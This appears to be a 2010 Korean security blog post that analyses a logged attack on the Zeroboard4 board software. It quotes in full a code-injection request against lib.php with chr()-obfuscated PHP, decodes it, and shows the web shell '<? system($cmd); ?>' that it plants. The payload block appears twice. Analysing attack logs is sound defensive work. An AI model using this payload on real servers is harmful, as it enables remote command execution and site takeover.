Zeroboard4 코드실행 취약점을 이용한 웹쉘공격
webhxxx/weblog 2010. 3. 9. 12:28 |얼마전에 발견한 제로보드공격로그입니다.
PoC를 그대로 썼네요
http://www.milw0rm.com/exploits/9590
/bbs/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=
알기쉽게 풀어보면=>
/bbs/lib.php?REMOTE_ADDR=*/fputs(fopen(./shell.php,w+),웹쉘내용);/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=
생성된 파일입니다
=====shell.php========
<? system($cmd); ?>
PoC를 그대로 썼네요
http://www.milw0rm.com/exploits/9590
/bbs/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=
알기쉽게 풀어보면=>
/bbs/lib.php?REMOTE_ADDR=*/fputs(fopen(./shell.php,w+),웹쉘내용);/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=
생성된 파일입니다
=====shell.php========
<? system($cmd); ?>
'webhxxx > weblog' 카테고리의 다른 글
안드로이드 user-agent (0) | 2010.05.11 |
---|---|
허니팟 (0) | 2010.03.14 |
Pangolin(MSSQL) (0) | 2009.12.18 |
User-Agent: Mediapartners-Google (0) | 2009.10.01 |
[webdav]웹 폴더서비스 이용시 발생하는 트래픽 (0) | 2009.09.30 |